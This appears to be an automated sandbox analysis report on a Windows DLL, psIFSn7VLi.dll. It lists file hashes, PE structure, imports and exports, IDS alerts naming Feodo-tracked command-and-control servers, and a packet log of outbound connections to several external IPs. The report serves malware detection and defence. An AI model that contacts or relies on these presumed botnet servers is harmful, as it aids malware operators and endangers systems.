                                                                        SHA-512:87A348647E7DDE354D081873479A7C00C3794CE6D72B11F553D9D5DEE32AADEB2497D0C9392006A00BA0D82980DEE0F25B0012B15DA5305BB318A29202691859
                                                                        Malicious:false
                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.120700808121365
                                                                        TrID:
                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                        • Windows Screen Saver (13104/52) 1.29%
                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:psIFSn7VLi.dll
                                                                        File size:901120
                                                                        MD5:46c0c3d61c9d7de7b0d8e183217a6cc8
                                                                        SHA1:ce31a65c73c0728e65d5385731d483f7e9f871c2
                                                                        SHA256:4533c9dc1c440bf97882358911acf6d3e25ff6b402ca442d752886904f72b786
                                                                        SHA512:93ab246702d4b34dc090ac63056d25158ad54ba49c446ae55c95b57e63b8280882557f9d014308ce17837bd2fbf37f6568d0c5fee7f07b3355ed1f274d24d2c3
                                                                        SSDEEP:12288:+t1xV1OkAShtOKAgHOSEvkHR0V0akoDZw/5:m1xV1EShtOKPEg0Kkm
                                                                        TLSH:7915D3836895A4E0D59B1B3B211D5FA730C7841D47C246EF2AF81B9C79E9AD4807CECE
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6R..r3..r3..r3...;..u3......t3..a;..p3...;..}3..r3...2..w?..n3..w?...3..Y...{3..w?..93..w?..s3...8..s3..w?..s3..Richr3.........

                                                                        File Icon

                                                                        Icon Hash:71b018ccc6577131

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x1003f780
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x10000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x623AA02C [Wed Mar 23 04:21:00 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:70b8cfa68ef2c7898ee65b9a0ce218ac

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push 0000000Ch
                                                                        push 10089A08h
                                                                        call 00007FA6305512D5h
                                                                        xor eax, eax
                                                                        inc eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                        xor edi, edi
                                                                        cmp esi, edi
                                                                        jne 00007FA63054FDEEh
                                                                        cmp dword ptr [1009A394h], edi
                                                                        je 00007FA63054FE99h
                                                                        mov dword ptr [ebp-04h], edi
                                                                        cmp esi, eax
                                                                        je 00007FA63054FDE7h
                                                                        cmp esi, 02h
                                                                        jne 00007FA63054FE13h
                                                                        mov eax, dword ptr [1009C0D0h]
                                                                        cmp eax, edi
                                                                        je 00007FA63054FDEEh
                                                                        push dword ptr [ebp+10h]
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp dword ptr [ebp-1Ch], edi
                                                                        je 00007FA63054FE6Bh
                                                                        push dword ptr [ebp+10h]
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA63054FC07h
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp eax, edi
                                                                        je 00007FA63054FE54h
                                                                        mov ebx, dword ptr [ebp+10h]
                                                                        push ebx
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA6305117E3h
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp esi, 01h
                                                                        jne 00007FA63054FDF0h
                                                                        cmp eax, edi
                                                                        jne 00007FA63054FDECh
                                                                        push ebx
                                                                        push edi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA63054FBDDh
                                                                        cmp esi, edi
                                                                        je 00007FA63054FDE7h
                                                                        cmp esi, 03h
                                                                        jne 00007FA63054FE0Bh
                                                                        push ebx
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA63054FBCAh
                                                                        test eax, eax
                                                                        jne 00007FA63054FDE5h
                                                                        mov dword ptr [ebp-1Ch], edi
                                                                        cmp dword ptr [ebp-1Ch], edi
                                                                        je 00007FA63054FDF5h
                                                                        mov eax, dword ptr [1009C0D0h]
                                                                        cmp eax, edi
                                                                        je 00007FA63054FDECh
                                                                        push ebx
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        or dword ptr [ebp-04h], FFFFFFFFh
                                                                        mov eax, dword ptr [ebp-1Ch]
                                                                        jmp 00007FA63054FDFCh
                                                                        mov eax, dword ptr [ebp-14h]
                                                                        mov ecx, dword ptr [eax]

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ASM] VS2003 (.NET) build 3077
                                                                        • [ C ] VS2003 (.NET) build 3077
                                                                        • [C++] VS2003 (.NET) build 3077
                                                                        • [EXP] VS2003 (.NET) build 3077
                                                                        • [RES] VS2003 (.NET) build 3077
                                                                        • [LNK] VS2003 (.NET) build 3077

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x948500x185.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9d0000xf0.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x2be66.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xf4a8.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8e1400x48.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9dba00xab0.idata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xa10000x40.didat
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x84ae80x85000False0.27153210173872183data5.302056329599929IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x860000xe9d50xf000False0.25263671875data4.44585720018697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x950000x70d40x4000False0.16986083984375data2.4289792449983194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata0x9d0000x37ce0x4000False0.29052734375data4.568283042984266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .didat0xa10000x3190x1000False0.0322265625data0.299592467810197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xa20000x2be660x2c000False0.7665516246448864data6.957504814219069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xce0000x1139b0x12000False0.5456136067708334data6.347143619787505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        0xa33300x20800dataEnglishAustralia
                                                                        RT_CURSOR0xc3b300x134dataEnglishAustralia
                                                                        RT_CURSOR0xc3c800x134dataEnglishUnited States
                                                                        RT_CURSOR0xc3db80xb4dataEnglishUnited States
                                                                        RT_CURSOR0xc3e980x134AmigaOS bitmap fontEnglishUnited States
                                                                        RT_CURSOR0xc3fe80x134dataEnglishUnited States
                                                                        RT_CURSOR0xc41380x134dataEnglishUnited States
                                                                        RT_CURSOR0xc42880x134dataEnglishUnited States
                                                                        RT_CURSOR0xc43d80x134dataEnglishUnited States
                                                                        RT_CURSOR0xc45280x134dataEnglishUnited States
                                                                        RT_CURSOR0xc46780x134dataEnglishUnited States
                                                                        RT_CURSOR0xc47c80x134dataEnglishUnited States
                                                                        RT_CURSOR0xc49180x134dataEnglishUnited States
                                                                        RT_CURSOR0xc4a680x134dataEnglishUnited States
                                                                        RT_CURSOR0xc4bb80x134AmigaOS bitmap fontEnglishUnited States
                                                                        RT_CURSOR0xc4d080x134dataEnglishUnited States
                                                                        RT_CURSOR0xc4e580x134dataEnglishUnited States
                                                                        RT_CURSOR0xc4fa80x134dataEnglishUnited States
                                                                        RT_BITMAP0xc51e00xb8dataEnglishUnited States
                                                                        RT_BITMAP0xc52980x144dataEnglishUnited States
                                                                        RT_ICON0xa2ef80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676EnglishAustralia
                                                                        RT_ICON0xa31e00x128GLS_BINARY_LSB_FIRSTEnglishAustralia
                                                                        RT_DIALOG0xa2e400xb8dataEnglishUnited States
                                                                        RT_DIALOG0xc50f80xe8dataEnglishUnited States
                                                                        RT_STRING0xc53e00x82dataEnglishUnited States
                                                                        RT_STRING0xc54680x2adataEnglishUnited States
                                                                        RT_STRING0xc54980x192dataEnglishUnited States
                                                                        RT_STRING0xc56300x4e2dataEnglishUnited States
                                                                        RT_STRING0xc5ea80x31adataEnglishUnited States
                                                                        RT_STRING0xc5bc80x2dcdataEnglishUnited States
                                                                        RT_STRING0xc6a080x8adataEnglishUnited States
                                                                        RT_STRING0xc5b180xacdataEnglishUnited States
                                                                        RT_STRING0xc68f80xdedataEnglishUnited States
                                                                        RT_STRING0xc61c80x4c4dataEnglishUnited States
                                                                        RT_STRING0xc66900x264dataEnglishUnited States
                                                                        RT_STRING0xc69d80x2cdataEnglishUnited States
                                                                        RT_STRING0xc6a980x42dataEnglishUnited States
                                                                        RT_GROUP_CURSOR0xc3c680x14Lotus unknown worksheet or configuration, revision 0x1EnglishAustralia
                                                                        RT_GROUP_CURSOR0xc3e700x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc46600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc3fd00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc45100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc43c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc4cf00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc42700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc49000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc41200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc47b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc4a500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc4ba00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc4e400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc4f900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_CURSOR0xc50e00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                        RT_GROUP_ICON0xa33080x22dataEnglishAustralia

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllGetVolumeInformationA, GetFullPathNameA, CreateFileA, GetShortPathNameA, GetCPInfo, GetOEMCP, FileTimeToSystemTime, SystemTimeToFileTime, SetErrorMode, FileTimeToLocalFileTime, LocalFileTimeToFileTime, SetFileTime, SetFileAttributesA, GetFileAttributesA, GetFileTime, HeapFree, RtlUnwind, HeapAlloc, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, GetCommandLineA, TerminateProcess, ExitThread, CreateThread, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, FatalAppExitA, FindFirstFileA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, UnhandledExceptionFilter, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, SetConsoleCtrlHandler, SetStdHandle, GetLocaleInfoW, SetEnvironmentVariableA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GlobalFlags, InterlockedDecrement, InterlockedIncrement, GetCurrentDirectoryA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, FreeResource, CreateEventA, SuspendThread, SetEvent, WaitForSingleObject, ResumeThread, SetThreadPriority, CloseHandle, GlobalAddAtomA, SetLastError, GlobalFree, CopyFileA, MulDiv, GlobalSize, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, GetCurrentThread, GetCurrentThreadId, GlobalLock, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcatA, WinExec, lstrcpyA, GetWindowsDirectoryA, LoadLibraryA, FreeLibrary, LoadResource, LockResource, SizeofResource, FindResourceA, ExitProcess, GetLastError, lstrlenA, lstrcmpiA, lstrcmpiW, GetStringTypeExA, GetStringTypeExW, lstrlenW, WideCharToMultiByte, CompareStringA, CompareStringW, GetEnvironmentVariableA, MultiByteToWideChar, GetEnvironmentVariableW, GetVersion, GetThreadLocale, GetLocaleInfoA, GetACP, GetVersionExA, IsBadWritePtr, InterlockedExchange
                                                                        USER32.dllGetSysColorBrush, DestroyIcon, GetDialogBaseUnits, GetMenuItemInfoA, DestroyMenu, FillRect, wsprintfA, ScrollWindowEx, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, IsDlgButtonChecked, SetDlgItemTextA, SetDlgItemInt, GetDlgItemTextA, GetDlgItemInt, CheckRadioButton, CheckDlgButton, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, ScrollWindow, TrackPopupMenuEx, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, UpdateWindow, DeleteMenu, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetScrollInfo, GetClassInfoA, RegisterClassA, UnregisterClassA, SetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowPos, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, CopyRect, GetWindow, GetDesktopWindow, SetActiveWindow, GetSystemMetrics, CreateDialogIndirectParamA, DestroyWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CharLowerW, CharLowerA, CharUpperW, CharUpperA, EnableWindow, GetSysColor, SendMessageA, MessageBeep, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, WindowFromPoint, EndPaint, BeginPaint, GetWindowDC, ValidateRect, MessageBoxA, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, GetMenu, TabbedTextOutA, SetCapture, RedrawWindow, ReleaseCapture, PtInRect, GetClientRect, SetCursor, SetWindowLongA, IsWindow, InvalidateRect, InflateRect, ReleaseDC, GetDC, GetParent, GetWindowRect, CopyIcon, LoadCursorA, PostQuitMessage, PostMessageA, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, ShowOwnedPopups, GetMenuState, GetMenuStringA, AppendMenuA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, SetScrollInfo
                                                                        GDI32.dllGetCurrentPositionEx, ArcTo, PolyDraw, PolylineTo, PolyBezierTo, ExtSelectClipRgn, DeleteDC, CreateDIBPatternBrushPt, CreatePatternBrush, CreateCompatibleDC, SelectPalette, PlayMetaFileRecord, GetObjectType, StartDocA, PlayMetaFile, CreatePen, ExtCreatePen, CreateSolidBrush, CreateHatchBrush, GetTextMetricsA, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, DPtoLP, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, EnumMetaFile, GetStockObject, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, SelectClipPath, CreateRectRgn, GetClipRgn, SelectClipRgn, DeleteObject, SetColorAdjustment, SetArcDirection, SetMapperFlags, SetTextCharacterExtra, SetTextJustification, SetTextAlign, MoveToEx, LineTo, OffsetClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, RestoreDC, SaveDC, SetBkColor, SetTextColor, GetClipBox, GetDCOrgEx, CreateBitmap, CreateDCA, CopyMetaFileA, GetDeviceCaps, GetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, PtVisible
                                                                        comdlg32.dllGetOpenFileNameA, GetSaveFileNameA, GetFileTitleA
                                                                        WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                                                                        ADVAPI32.dllRegDeleteKeyA, RegCreateKeyA, RegDeleteValueA, RegSetValueExA, RegCreateKeyExA, RegEnumKeyA, RegCloseKey, RegOpenKeyA, RegSetValueA, RegQueryValueExA, RegOpenKeyExA, RegQueryValueA
                                                                        SHELL32.dllExtractIconA, SHGetFileInfoA, ShellExecuteA
                                                                        COMCTL32.dll
                                                                        SHLWAPI.dllPathFindExtensionA, PathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA
                                                                        ole32.dllCoTreatAsClass, StringFromCLSID, ReadClassStg, ReadFmtUserTypeStg, CreateBindCtx, WriteClassStg, WriteFmtUserTypeStg, SetConvertStg, CoTaskMemFree, CoTaskMemAlloc, ReleaseStgMedium, OleDuplicateData, CoDisconnectObject, CoCreateInstance, StringFromGUID2, CLSIDFromString, OleRegGetUserType
                                                                        OLEAUT32.dllVariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString, SysStringLen, SysAllocStringByteLen, SysStringByteLen, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayCreate, SafeArrayRedim, VariantCopy, SafeArrayAllocData, SafeArrayAllocDescriptor, SafeArrayCopy, SafeArrayGetElement, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayLock, SafeArrayUnlock, SafeArrayDestroy, SafeArrayDestroyData, SafeArrayDestroyDescriptor, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocString, SysReAllocStringLen, VarDateFromStr, VarBstrFromDec, VarDecFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate

                                                                        Exports

                                                                        NameOrdinalAddress
                                                                        DllRegisterServer10x10001186
                                                                        DllUnregisterServer20x10001195

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishAustralia
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        192.168.2.446.55.222.11498634432404334 07/20/22-00:21:19.660167TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 1849863443192.168.2.446.55.222.11
                                                                        192.168.2.4131.100.24.23149872802404306 07/20/22-00:22:59.973972TCP2404306ET CNC Feodo Tracker Reported CnC Server TCP group 44987280192.168.2.4131.100.24.231
                                                                        192.168.2.451.91.76.894976080802404338 07/20/22-00:19:39.513193TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20497608080192.168.2.451.91.76.89

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jul 20, 2022 00:19:39.513192892 CEST497608080192.168.2.451.91.76.89
                                                                        Jul 20, 2022 00:19:39.536540985 CEST80804976051.91.76.89192.168.2.4
                                                                        Jul 20, 2022 00:19:40.105530977 CEST497608080192.168.2.451.91.76.89
                                                                        Jul 20, 2022 00:19:40.126441002 CEST80804976051.91.76.89192.168.2.4
                                                                        Jul 20, 2022 00:19:40.808762074 CEST497608080192.168.2.451.91.76.89
                                                                        Jul 20, 2022 00:19:40.830540895 CEST80804976051.91.76.89192.168.2.4
                                                                        Jul 20, 2022 00:19:40.843548059 CEST497618080192.168.2.4173.254.208.91
                                                                        Jul 20, 2022 00:19:41.007450104 CEST808049761173.254.208.91192.168.2.4
                                                                        Jul 20, 2022 00:19:41.605851889 CEST497618080192.168.2.4173.254.208.91
                                                                        Jul 20, 2022 00:19:41.772378922 CEST808049761173.254.208.91192.168.2.4
                                                                        Jul 20, 2022 00:19:42.308891058 CEST497618080192.168.2.4173.254.208.91
                                                                        Jul 20, 2022 00:19:42.473402977 CEST808049761173.254.208.91192.168.2.4
                                                                        Jul 20, 2022 00:19:42.518814087 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:42.518877029 CEST44349762149.56.128.192192.168.2.4
                                                                        Jul 20, 2022 00:19:42.518975973 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:42.537899017 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:42.537946939 CEST44349762149.56.128.192192.168.2.4
                                                                        Jul 20, 2022 00:19:42.882864952 CEST44349762149.56.128.192192.168.2.4
                                                                        Jul 20, 2022 00:19:42.883017063 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:43.327409983 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:43.327465057 CEST44349762149.56.128.192192.168.2.4
                                                                        Jul 20, 2022 00:19:43.328063965 CEST44349762149.56.128.192192.168.2.4
                                                                        Jul 20, 2022 00:19:43.328210115 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:43.332410097 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:19:43.372520924 CEST44349762149.56.128.192192.168.2.4
                                                                        Jul 20, 2022 00:20:15.830521107 CEST49762443192.168.2.4149.56.128.192
                                                                        Jul 20, 2022 00:20:16.089051008 CEST4977780192.168.2.4120.50.40.183
                                                                        Jul 20, 2022 00:20:19.124555111 CEST4977780192.168.2.4120.50.40.183
                                                                        Jul 20, 2022 00:20:25.125055075 CEST4977780192.168.2.4120.50.40.183
                                                                        Jul 20, 2022 00:20:37.392364979 CEST498298080192.168.2.4160.16.218.63
                                                                        Jul 20, 2022 00:20:40.407690048 CEST498298080192.168.2.4160.16.218.63
                                                                        Jul 20, 2022 00:20:46.580015898 CEST498298080192.168.2.4160.16.218.63
                                                                        Jul 20, 2022 00:20:58.602675915 CEST498588080192.168.2.4206.188.212.92
                                                                        Jul 20, 2022 00:21:01.596966028 CEST498588080192.168.2.4206.188.212.92
                                                                        Jul 20, 2022 00:21:07.597471952 CEST498588080192.168.2.4206.188.212.92
                                                                        Jul 20, 2022 00:21:19.660166979 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.660232067 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:19.660329103 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.665569067 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.665601969 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:19.838284969 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:19.838403940 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.846988916 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.847004890 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:19.847331047 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:19.847402096 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.848023891 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:19.888503075 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:20.018318892 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:20.018424034 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.018439054 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:20.018518925 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.056128025 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.056163073 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:20.056169987 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.056225061 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.097831011 CEST498648080192.168.2.479.172.212.216
                                                                        Jul 20, 2022 00:21:20.130996943 CEST80804986479.172.212.216192.168.2.4
                                                                        Jul 20, 2022 00:21:20.708050966 CEST498648080192.168.2.479.172.212.216
